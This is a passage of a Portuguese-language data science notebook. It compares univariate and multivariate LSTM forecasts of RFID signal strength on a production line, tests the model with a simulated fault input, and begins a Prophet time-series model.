# + id="E-oJH5swD1Dm" colab={"base_uri": "https://localhost:8080/", "height": 419} executionInfo={"status": "ok", "timestamp": 1607188683834, "user_tz": 180, "elapsed": 998, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ee9c9890-0657-41c3-f538-318dd3e53922"
# Align the forecasts to the test index and attach them as a new column.
dftempor = pd.DataFrame(iforecasts, columns=['FORECAST'])
dftempor.index = dfOriginalTest.index
dfOriginalTest['FORECAST'] = dftempor['FORECAST']
dfOriginalTest
# + [markdown] id="5XhKywt47TEN"
# Escolhemos apenas uma fatia do todo para melhor visualizar o gráfico e entender a comparação dos resultados em relação ao Forecast.
# + id="y90L2TQxVYEl" colab={"base_uri": "https://localhost:8080/", "height": 592} executionInfo={"status": "ok", "timestamp": 1607188695238, "user_tz": 180, "elapsed": 1606, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2932be10-0f0a-43fb-d587-d1471d684c2a"
# Plot the tail of the training series plus the first 200 test points and
# their forecasts for a readable comparison window.
plt.figure(figsize=(25,10))
plt.plot(dfOriginal.iloc[35447:, :])
plt.plot(dfOriginalTest.iloc[:200, :])
plt.legend(['Train', 'Test', 'Forecast'])
plt.show()
# + [markdown] id="kW--pWwt7JXm"
# De acordo com a figura acima, percebemos que a linha do Forecast se manteve em tendência uniforme para o modelo LSTM Multivariate.
# + [markdown] id="9xWFkjpg8ydC"
# #### Outros testes LSTM (Univariate)
# + [markdown] id="aUHbBdQU8-c2"
# No modelo a seguir iremos utilizar todos os métodos que já foram desenvolvidos e explicados acima para gerar um novo modelo com um único atributo e, assim, comparar os resultados a fim de entender a relevância dos atributos escolhidos no resultado final.
# + colab={"base_uri": "https://localhost:8080/"} id="gDSb3jCb7IeW" executionInfo={"status": "ok", "timestamp": 1607188744531, "user_tz": 180, "elapsed": 1004, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="62590071-fc42-41ec-b39d-9c68ac2505a5"
# Univariate variant: reload the data and drop every column except the
# validation value itself.
df_LSTMSingle = pd.read_csv('Dataset/FinalOutput.csv', index_col=0)
df_LSTMSingle
df_LSTMSingle = df_LSTMSingle.drop(['TIMESTAMP','EPC','MIN','MAX','MEAN','COUNT'], axis=1)
dfValuesSingle = df_LSTMSingle.values
dfValuesSingle = dfValuesSingle.astype('float32')
dfValuesSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 241} id="6Y0cw7tg-QcW" executionInfo={"status": "ok", "timestamp": 1607188747392, "user_tz": 180, "elapsed": 1339, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="166e7f1c-1507-475a-c48a-210082e7df04"
# Univariate supervised framing: 30 past values in, 10 future values out.
dfSingle = series_to_supervised(dfValuesSingle, n_in=30, n_out=10, dropnan=True)
dfSingle.head()
# + colab={"base_uri": "https://localhost:8080/"} id="AVFWMjyr_Gj6" executionInfo={"status": "ok", "timestamp": 1607188751468, "user_tz": 180, "elapsed": 1345, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2081a43d-85a0-48f1-d45f-21e5c02fb3ee"
# Univariate split: first 30 columns are the inputs, last 10 the targets.
X = np.array(dfSingle)[:, :30]
print ('Atributos (%d x %d):' % (X.shape[0],X.shape[1]))
print (X)
y = np.array(dfSingle)[:,30:]
print ('Classe (%d x %d):' % (y.shape[0],y.shape[1]))
print (y)
# + colab={"base_uri": "https://localhost:8080/"} id="d8NxKLa5_be-" executionInfo={"status": "ok", "timestamp": 1607188754517, "user_tz": 180, "elapsed": 1048, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b87a6435-6319-4626-a083-2f2cccb03a17"
# Re-fit fresh [0, 1] scalers for the univariate data.
scalerX = MinMaxScaler(feature_range=(0, 1))
scalerY = MinMaxScaler(feature_range=(0, 1))
X_N = scalerX.fit_transform(X)
y_N = scalerY.fit_transform(y)
print('Tamanho do Dataset: ', X_N.shape[0])
print('Quantidade de Períodos (Atributos): ', X_N.shape[1])
print('Quantidade de Períodos (Classe): ', y_N.shape[1])
# + colab={"base_uri": "https://localhost:8080/", "height": 316} id="s_I4s5MU__jj" executionInfo={"status": "ok", "timestamp": 1607188756833, "user_tz": 180, "elapsed": 1037, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="e1ea0ae3-e22e-472f-9eb3-4bc8323a8d0e"
# Same chronological 80/20 split as the multivariate model.
X_Train, X_Test, y_Train, y_Test = train_test_split(X_N, y_N, test_size=0.2, shuffle=False, random_state=100)
plt.pie([X_Train.shape[0],X_Test.shape[0]], labels=['Train','Test'], shadow=True)
plt.show()
print('Atributos - Train: ', X_Train.shape)
print('Atributos - Test:', X_Test.shape)
print('Classes - Train: ', y_Train.shape)
print('Classes - Test:', y_Test.shape)
# + colab={"base_uri": "https://localhost:8080/"} id="LlTMp6fg__ra" executionInfo={"status": "ok", "timestamp": 1607188760318, "user_tz": 180, "elapsed": 1102, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="cb5db85a-be3b-4929-bfad-4fb5d2dbcd3d"
# 3D input for the univariate LSTM: 30 timesteps x 1 feature.
X_Train = X_Train.reshape((X_Train.shape[0], 30, 1))
X_Test = X_Test.reshape((X_Test.shape[0], 30, 1))
print (X_Train.shape, X_Test.shape, y_Train.shape, y_Test.shape)
# + colab={"base_uri": "https://localhost:8080/", "height": 775} id="RA-GT52UAhGm" executionInfo={"status": "ok", "timestamp": 1607189228107, "user_tz": 180, "elapsed": 457716, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8bedf881-fa24-4cd1-d1e9-6a88e8a7f1e9"
histSingle, modelSingle = fitModel(X_Train, y_Train, X_Test, y_Test, 64, 4, 15)
# + id="lkYG2QphA3Fu" executionInfo={"status": "ok", "timestamp": 1607189263472, "user_tz": 180, "elapsed": 1154, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
modelSingle.save('model_LSTM_Single.h5')
# + colab={"base_uri": "https://localhost:8080/"} id="rz4zOGpcA3Os" executionInfo={"status": "ok", "timestamp": 1607189537252, "user_tz": 180, "elapsed": 270830, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2b2e06ce-03bd-41c2-c729-1e63b3f1f9c7"
# Forecast every test window with the univariate model.
yPred = list()
for i in range (len(X_Test)):
  forecast = predict_lstm(modelSingle, X_Test[i], 1)
  yPred.append(forecast)
yPred
# + colab={"base_uri": "https://localhost:8080/"} id="LIW3NtISA3Uz" executionInfo={"status": "ok", "timestamp": 1607189537253, "user_tz": 180, "elapsed": 265587, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="38fe71e4-607d-4bec-fca2-a799d256a4ef"
# Copy test targets into a list of rows, matching yPred's layout.
yTest = [row[:] for row in y_Test]
yTest
# + colab={"base_uri": "https://localhost:8080/"} id="R8xqhIWtA3ca" executionInfo={"status": "ok", "timestamp": 1607189537254, "user_tz": 180, "elapsed": 256971, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2373e603-d612-4599-dd44-2053f3bd17c1"
# Per-horizon RMSE of the univariate model (normalized scale).
for i in range(10):
  actuals = [row[i] for row in yTest]
  predicted = [forecast[i] for forecast in yPred]
  rmse = sqrt(mean_squared_error(actuals, predicted))
  print('t+%d RMSE: %f' % ((i+1), rmse))
# + colab={"base_uri": "https://localhost:8080/"} id="mgpse5YyA3ac" executionInfo={"status": "ok", "timestamp": 1607189561772, "user_tz": 180, "elapsed": 1657, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b5327263-7b29-4ec3-a378-b1cf21fff015"
# Univariate forecasts back in real RSSI units.
iforecasts = inverse_transform(yPred, scalerY)
iforecasts
# + colab={"base_uri": "https://localhost:8080/"} id="IKtSklDtCPKq" executionInfo={"status": "ok", "timestamp": 1607189566234, "user_tz": 180, "elapsed": 1972, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="3473120d-456e-4a53-bf11-5b93c0b10306"
# Univariate test targets back in real RSSI units.
iyTest = inverse_transform(yTest, scalerY)
iyTest
# + colab={"base_uri": "https://localhost:8080/"} id="f95kMctqCPNk" executionInfo={"status": "ok", "timestamp": 1607189570388, "user_tz": 180, "elapsed": 2718, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="ac9e07aa-d98f-4240-f986-71ca842c5a99"
# Univariate training targets back in real RSSI units.
iyTrain = inverse_transform(y_Train, scalerY)
iyTrain
# + id="NG4YvuHVCPTe" executionInfo={"status": "ok", "timestamp": 1607189572927, "user_tz": 180, "elapsed": 1131, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Keep only the t+1 step of each row, then flatten to 1-D series for plotting.
iforecasts = [row[:1] for row in iforecasts]
iyTest = [row[:1] for row in iyTest]
iyTrain = [row[:1] for row in iyTrain]
iyTrain=np.array(iyTrain).reshape(-1)
iyTest=np.array(iyTest).reshape(-1)
iforecasts=np.array(iforecasts).reshape(-1)
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="Bv_EJrHrCPge" executionInfo={"status": "ok", "timestamp": 1607189576442, "user_tz": 180, "elapsed": 1007, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="cada1b5b-f131-4b2b-f6f5-21bc2f915bd1"
# Univariate training series as a DataFrame for the comparison plot.
dfOriginalSingle = pd.DataFrame(iyTrain, columns=['TRAIN'])
dfOriginalSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="Hd3ld8fYCPjq" executionInfo={"status": "ok", "timestamp": 1607189579862, "user_tz": 180, "elapsed": 1229, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="80749747-5db8-4f0c-9497-c137375b5caf"
# Test series indexed to follow the training series (same one-index overlap
# as the multivariate version — presumably for visual continuity in the plot).
dfOriginalTestSingle = pd.DataFrame(iyTest, columns=['TEST'])
dfOriginalTestSingle.index = np.arange(len(dfOriginalSingle)-1, len(dfOriginalTestSingle)+len(dfOriginalSingle)-1)
dfOriginalTestSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="eOMokwCxCPQ1" executionInfo={"status": "ok", "timestamp": 1607189582871, "user_tz": 180, "elapsed": 987, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="24765f85-dbee-451c-e79b-92c2b6488839"
# Attach the univariate forecasts aligned to the test index.
dftempor = pd.DataFrame(iforecasts, columns=['FORECAST'])
dftempor.index = dfOriginalTestSingle.index
dfOriginalTestSingle['FORECAST'] = dftempor['FORECAST']
dfOriginalTestSingle
# + colab={"base_uri": "https://localhost:8080/", "height": 592} id="ZIawxDQxC1Zy" executionInfo={"status": "ok", "timestamp": 1607189590066, "user_tz": 180, "elapsed": 1700, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="99dd589d-41d5-4248-a3aa-a9e0cfb29f53"
# Plot the tail of the train series next to the first 200 test points and the
# corresponding forecasts (all three share the continuous index built above).
plt.figure(figsize=(25,10))
plt.plot(dfOriginalSingle.iloc[35447:, :])
plt.plot(dfOriginalTestSingle.iloc[:200, :])
plt.legend(['Train', 'Test', 'Forecast'])
plt.show()
# + [markdown] id="rAxakC0KGGPa"
# #### Conclusão LSTM
# + [markdown] id="QxUincYiGRQX"
# Em relação aos dois modelos LSTM que utilizamos percebemos que não existem muitas diferenças entre eles, ou seja, o uso de todos os atributos não melhorou o modelo de forma significativa. A natureza dos dados coletados são uniformes, como vistos na analise estatísticas o que justifica essa mínima diferença entre os dois.
#
# Quanto a predição estar próxima dos -38 pode ser pelo fato da maioria dos dados de treino estarem dentro desse intervalo, como observado no histograma abaixo.
# + id="-qVg0nlGHhLY" colab={"base_uri": "https://localhost:8080/", "height": 320} executionInfo={"status": "ok", "timestamp": 1607189620694, "user_tz": 180, "elapsed": 1025, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="517e35f0-56e7-4a25-898e-52705591be6c"
# Histogram of the training target, to show where most values concentrate.
plt.figure(figsize=(15,5))
plt.hist(iyTrain, cumulative=False)
plt.show()
# + [markdown] id="cwbFhYEUHlkf"
# Um ensaio foi feito apresentando para o modelo (utilizado o univariate) novos valores simulando uma condição de problema.
# + id="0bMPIixZBRsx" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190694755, "user_tz": 180, "elapsed": 997, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="8d18f022-a239-4941-bedc-bc1d46d381c5"
# Hand-crafted input window (30 readings) simulating an out-of-spec condition,
# shaped (1, 30) to match the model's expected input.
NovaEntrada = np.array([[-60,-60,-60,-62,-62,-62,-62,-62,-55,-55,-55,-55,-55,-53,-53,-53,-53,-53,-53,-53,-60,-60,-60,-60,-60,-60,-62,-62,-62,-62]])
NovaEntrada.shape
# + id="dOepMMBHJv3m" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190695999, "user_tz": 180, "elapsed": 547, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="454bebb6-4915-4676-ff68-b4ae04a92c16"
# Scale the simulated window with the scaler fitted on the training inputs.
# (The reshape is a no-op here since NovaEntrada is already (1, 30).)
NovaEntrada = scalerX.transform(NovaEntrada.reshape(1,30))
NovaEntrada
# + id="jq6ibeuGKM4L" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190697760, "user_tz": 180, "elapsed": 581, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c809d448-bfaa-425b-ee08-32194ac44fa6"
# Run the univariate LSTM on the simulated window (30 timesteps, 1 feature),
# forecasting 1 batch of future steps.
pred = predict_lstm(modelSingle, NovaEntrada.reshape(30,1), 1)
pred
# + id="dghEYfQMLDKL" executionInfo={"status": "ok", "timestamp": 1607190702944, "user_tz": 180, "elapsed": 994, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# De-scale the 10-step prediction back to the original RSSI units.
pred = scalerY.inverse_transform(np.array(pred).reshape(1,10))
# + id="DYbnzB9cLnD6" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1607190705342, "user_tz": 180, "elapsed": 1477, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="1c7ced10-acb9-465b-c952-b102a51291c0"
# Inspect the de-scaled 10-step forecast for the simulated fault window.
pred
# + [markdown] id="3dP2alzAI5Id"
# Muitos resultados demonstraram um comportamento fora do padrão aceitável para o processo de validação na linha de produção que seria entre -37 e -39. Significa que através dessa predição o sistema poderia identificar um comportamento inaceitável.
# + [markdown] id="cgM-4nWeKFis"
# ### Prophet
# + [markdown] id="2lHXtsU1Rr8n"
# O modelo de previsão base do Prophet utiliza a equação abaixo:<br>
# y(t) = g(t) + h(t) + s(t) + et
#
# Onde:<br>
# g(t): função de tendência, que no Prophet pode ser linear ou logístico<br><br>
# s(t): sazonalidade, que neste caso são períodos específicos de tempo que podem afetar a tendência e por padrão são desativados no Prophet<br><br>
# h(t): ciclos do ano, que são os "feriados", os quais possuem uma listagem no Prophet específica por país e por padrão não são considerados no modelo<br><br>
# et: erro da previsão, que é tratado como distribuição gausiana no Prophet<br><br>
# O modelo do Prophet se baseia em uma análise univariada, sendo que os únicos parâmetros recebidos são o espaço de tempo (ds) e y(t) VALIDATION.
# + id="H23ENrpYA8bZ" executionInfo={"status": "ok", "timestamp": 1607190802632, "user_tz": 180, "elapsed": 2138, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
from fbprophet import Prophet
from fbprophet.plot import add_changepoints_to_plot
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="N5-BbCxpBBxM" executionInfo={"status": "ok", "timestamp": 1607190849878, "user_tz": 180, "elapsed": 967, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="b8928a44-fab4-4148-f8f1-9c92fa34befb"
# Reload the consolidated dataset; the first CSV column is the index.
df_original = pd.read_csv('Dataset/FinalOutput.csv', index_col=0)
df_original.tail()
# + [markdown] id="W6IlYIFvBcwh"
# O Prophet requer um dataframe contendo as colunas ds (datastamp) e y (classe).
# A coluna ds requer algum tipo de time stamp reconhecido pelo Pandas para poder treinar de maneira adequada.
# Neste caso, criou-se um range com data de inicio arbitraria, um tamanho igual ao tamanho do dataframe original e um incremento de um milissegundo.
# + id="av4T60bNBEN8" executionInfo={"status": "ok", "timestamp": 1607190894378, "user_tz": 180, "elapsed": 1035, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}}
# Prophet requires a real datetime column, so build a synthetic timestamp series
# (arbitrary start date, 1 ms increments, one stamp per row).
time_index = pd.date_range(start='1/1/2019', periods=df_original.shape[0],freq='ms') # synthetic time-stamp series with 1 ms increments
min_period = 0 # first row of the analysis window
max_period = df_original.shape[0] # last row of the analysis window
# + [markdown] id="_RwE_FJeCPvH"
# O novo dataset foi criado, mantendo-se apenas as colunas VALIDATION e TIMESTAMP do dataset original.
# Conforme necessário pelo Prophet, a coluna VALIDATION foi renomeada para y e a coluna TIMESTAMP foi renomeada para ds.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="wjaLCvvYBTjg" executionInfo={"status": "ok", "timestamp": 1607190927650, "user_tz": 180, "elapsed": 981, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="feb12b86-7bf1-4b98-d20b-6ae7d996292e"
# Keep only TIMESTAMP/VALIDATION and rename them to the ds/y pair Prophet expects.
df_Prophet = df_original.drop(columns=['EPC', 'MIN', 'MAX', 'MEAN', 'COUNT']).rename(
    columns={'VALIDATION': 'y', 'TIMESTAMP': 'ds'}
)
df_Prophet.head()
# + [markdown] id="jOj1vM8cDG1p"
# Como havia inconsistências no index do dataset, reiniciaram-se os valores, deixando assim o incremento contínuo.
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="aEUiJx1NCw9A" executionInfo={"status": "ok", "timestamp": 1607190939897, "user_tz": 180, "elapsed": 984, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="c67096d2-00ec-4c1a-9f79-39631ccad72b"
# The original index has gaps; rebuild a contiguous 0..n-1 RangeIndex.
df_Prophet = df_Prophet.reset_index(drop=True)
df_Prophet
# + [markdown] id="mR2rL-LtDYin"
# Os valores da coluna ds foram sobrescritos com a série de tempo com incremento de um milissegundo criada.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="530iuupkCjWI" executionInfo={"status": "ok", "timestamp": 1607190959304, "user_tz": 180, "elapsed": 972, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="f3f2e2b0-f364-405b-f89d-03e53220ae82"
# Overwrite ds with the synthetic 1 ms-resolution timestamp series.
df_Prophet['ds'] = time_index
df_Prophet.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 419} id="7aTwrV6DDp1b" executionInfo={"status": "ok", "timestamp": 1607190969257, "user_tz": 180, "elapsed": 1020, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="257c3f84-09a9-46a7-c3d4-2db1c6b9467c"
# Restrict the analysis to the configured window (here: the whole dataset).
df_window = df_Prophet.iloc[min_period:max_period,:]
df_window
# + [markdown] id="QFED6IEsBMia"
# #### Prophet com crescimento linear
# O termo g(t) é o modelo de tendência do modelo de regressão aditiva utilizado pelo Prophet, ele pode ter modelo de crescimento linear ou logístico. <br>
# Para este primeiro teste realizado, aplicou-se o modelo linear, que necessita de um dataset com ds (date stamp) e y (valor analisado).<br>
# O modelo linear gera uma têndencia de crescimento linear, sendo que esta pode ser de crescimento positivo ou negativo.<br>
# O modelo linear não é capaz de lidar com alterações de tendência ou saturação de crescimento.
# + [markdown] id="Z0gZOnsUVjw0"
# Para se manter os parâmetros similares entre os modelos LSTM e Prophet, realizou-se a divisão do dataset entre treino e teste com a proporção de 80% e 20%, sem modo shuffle e com semente aleatória 100
# + colab={"base_uri": "https://localhost:8080/"} id="GMZH4_x_ET1b" executionInfo={"status": "ok", "timestamp": 1607191038987, "user_tz": 180, "elapsed": 1111, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="f81517e0-8a7f-45f6-bc6f-2ecec4fe6d9c"
# 80/20 chronological split (shuffle=False keeps the time order) to mirror the
# LSTM experiment setup.
df_train, df_test = train_test_split(df_window, test_size=0.2, shuffle=False, random_state=100)
train_size, test_size = len(df_train), len(df_test)
print(df_train.shape, df_test.shape)
# + [markdown] id="yFOZPSYKV7-I"
# Outra prática adotada para que as métricas de avaliação pudessem ser comparadas foi o escalonamento do dataset de treino com valor de 0 a 1 (mínimo e máximo), com escalonador treinado sendo utilizado posteriormente para o dataset de previsão e de teste.
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="YEMjhQ07Ek85" executionInfo={"status": "ok", "timestamp": 1607191053499, "user_tz": 180, "elapsed": 1002, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="649aa179-9777-4eef-ddd3-5ff9a65138f5"
# Fit a 0-1 MinMax scaler on the training target only (no test-set leakage)
# and scale the train 'y' in place.
df_train = df_train.copy()  # de-link from the split slice: avoids SettingWithCopyWarning
scaler = MinMaxScaler(feature_range=(0, 1))
scaler.fit(df_train[['y']])
df_train['y'] = scaler.transform(df_train[['y']])
df_train.head()
# + [markdown] id="Sp5Kw26WXwKs"
# Para a análise, instanciou-se um modelo Prophet e realizou o **método fit** do modelo utilizando como parâmetro o dataset de treino.<br>
# Após o método fit, gerou-se um novo dataset, chamado de **future**, com o método make_future_dataframe. Este método recebe como parâmetro a quantidade de unidades futuras a se gerar e qual a frequência temporal considerada.<br>
# Neste caso, utilizou-se uma quantidade igual ao tamanho do dataset de teste, para que seja possível realizar a comparação dos valores reais e previstos. Outro parâmetro utilizado foi a frequência em milissegundos.<br>
# O dataset future gerado tem o mesmo tamanho do dataset original e possui apenas a coluna ds (date stamp), com a série temporal do dataset de treino mais o número de previsões futuras.<br><br>
# Após a criação do dataset future, gerou-se o dataset de previsão (**forecast**), que é gerado a partir do método predict do modelo, passando como parâmetro o dataset future.
# + colab={"base_uri": "https://localhost:8080/"} id="G2OxQ54nFir9" executionInfo={"status": "ok", "timestamp": 1607191184035, "user_tz": 180, "elapsed": 47833, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="2dc93ad2-07c4-4f13-c3be-22755c0c378e"
# Fit a default (linear-growth) Prophet model on the scaled training data,
# extend the timeline by test_size 1 ms steps, and predict over the full range.
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=test_size, freq='ms')
forecast = model.predict(future)
# + [markdown] id="EWgWH6PyZ2Md"
# Após a realização da previsão dos dados futuros, gerou-se o gráfico com a apresentação dos resultados e o gráfico com os valores de treino mais a tendência gerada com seu intervalo de incerteza.<br>
# No primeiro gráfico, pode-se observar a **linha sólida vermelha** como a tendência do modelo gerado, os **pontos pretos** distribuídos são os valores do dataset de treino original, as **linhas pontilhadas vermelhas verticais** são os pontos de mudança de tendência identificados e a **faixa azul clara** em torno da tendência é o intervalo de incerteza.<br>
# No segundo gráfico, pode-se observar a linha de tendência gerada pelo modelo e o intervalo de incerteza da previsão futura gerada.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="HqTTG9BPGijQ" executionInfo={"status": "ok", "timestamp": 1607191214078, "user_tz": 180, "elapsed": 3294, "user": {"displayName": "Manuel Rodrigues", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GjulwoacYbOKa_cWHHnWza7N7FIal8P0oxUERh59w=s64", "userId": "00973487492077262858"}} outputId="78f02d65-9be0-444d-a0d2-ee37f0d23af2"
# Forecast plot with detected changepoints overlaid, plus the component plots
# (trend and any seasonalities) with their uncertainty intervals.
fig = model.plot(forecast,figsize=(25,10))
a = add_changepoints_to_plot(fig.gca(), model, forecast)
fig2 = model.plot_components(forecast,figsize=(25,10))
plt.show()
# + [markdown] id="oD7NxXADbt-h"
# Para poder se avaliar a métrica da raíz do erro quadrático médio, escalonou-se também o dataset de teste, utilizando o escalonador gerado com o dataset de treino.
